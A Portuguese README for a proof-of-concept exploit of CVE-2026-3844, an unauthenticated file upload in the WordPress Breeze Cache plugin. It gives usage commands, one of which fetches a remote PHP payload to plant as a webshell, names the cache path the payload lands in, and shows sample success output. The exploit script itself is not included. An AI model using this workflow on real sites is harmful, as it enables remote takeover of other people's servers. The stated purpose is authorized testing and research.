
Prova de conceito em Python para CVE-2026-3844, um upload arbitrário de arquivos não autenticado no plugin WordPress Breeze Cache, permitindo execução remota de código. Inclui detecção, exploração e verificação de webshell.
Este repositório contém um script de prova de conceito (PoC) em Python para demonstrar uma vulnerabilidade de Upload Arbitrário de Arquivo Não Autenticado que afeta o plugin WordPress Breeze Cache <= 2.4.4.
⚠️ Este projeto destina-se estritamente a testes de segurança autorizados, pesquisa educacional e validação defensiva.
A vulnerabilidade abusa da funcionalidade de cache de gravatar do Breeze Cache para armazenar arquivos controlados pelo atacante dentro do diretório de cache do WordPress.
pycurltermcolorInstale as dependências:
pip install pycurl termcolor
| Arquivo | Descrição |
|---|---|
CVE-2026-3844.py | Script principal do PoC |
CVE-2026-3844.yaml | Template/configuração YAML |
python3 CVE-2026-3844.py -u http://target.com --check-only
python3 CVE-2026-3844.py -u http://target.com
python3 CVE-2026-3844.py -u http://target.com -p https://example.com/payload.php
python3 CVE-2026-3844.py -u http://target.com -o results.txt
O script executa as seguintes etapas:
O payload enviado pode se tornar acessível a partir de:
/wp-content/cache/breeze-extra/gravatars/
A exploração bem-sucedida pode depender da seguinte configuração do Breeze estar habilitada:
Host Files Locally - Gravatars
Se o recurso estiver desabilitado, as tentativas de exploração podem falhar.
[+] Target VULNERABLE (Breeze v2.4.4)
[+] Comment posted successfully
[+] File found at: http://target.com/wp-content/cache/breeze-extra/gravatars/random.php
[+] VERIFICATION STRING FOUND - EXPLOIT SUCCESSFUL!
Este repositório é fornecido para:
Não use este projeto contra sistemas que você não possui ou para os quais não tem permissão explícita para testar.
O autor não assume responsabilidade por uso indevido ou danos causados por este projeto.
Administradores de sites devem:
/wp-content/cache/ em busca de arquivos suspeitosEsta prova de conceito foi criada para ajudar:
a entender os riscos de segurança associados a mecanismos de cache inseguros e uploads arbitrários de arquivos.
Projeto Educacional / Pesquisa de Segurança